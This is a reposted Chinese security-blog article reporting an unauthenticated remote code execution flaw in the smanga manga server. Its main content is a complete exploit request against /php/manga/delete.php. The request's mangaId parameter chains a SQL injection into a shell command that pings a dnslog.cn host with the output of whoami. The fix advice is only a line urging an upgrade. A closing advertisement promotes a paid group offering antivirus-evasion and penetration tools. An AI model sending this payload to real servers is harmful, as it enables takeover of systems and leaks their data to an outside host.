由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
0x01 前言
smanga存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。
0x02 漏洞等级
高危0x03 漏洞影响
smanga系统0x04 漏洞复现
登录界面是这个样子~~~
环境搭建可以参考这个:
https://www.bilibili.com/read/cv21910784/EXP:
POST /php/manga/delete.php HTTP/1.1Host: 127.0.0.1:8181Content-Length: 360Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1:8181Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPad; CPU OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://127.0.0.1:8181/php/manga/delete.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closemangaId=1+union+select+*+from+%28select+1%29a+join+%28select+2%29b+join+%28select+3%29c+join+%28select+4%29d+join+%28select+%27%5C%22%3Bping+-c+3+%60whoami%60.uoi9vt.dnslog.cn%3B%5C%22%27%29e+join+%28select+6%29f+join+%28select+7%29g+join+%28select+8%29h+join+%28select+9%29i+join+%28select+10%29j+join+%28select+11%29k+join+%28select+12%29l%3B&deleteFile=true
命令执行成功
0x05 修复建议
官方已经发布修复补丁,请进行升级。
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
加入安全交流群
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247509833&idx=2&sn=0257ad9f97af05fdebbe9a7b6dc9e0bd&chksm=c1765ae6f601d3f0fc6944dea910ffa37806b8cc4042beb9ea2a3022815566951790fd08c667&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh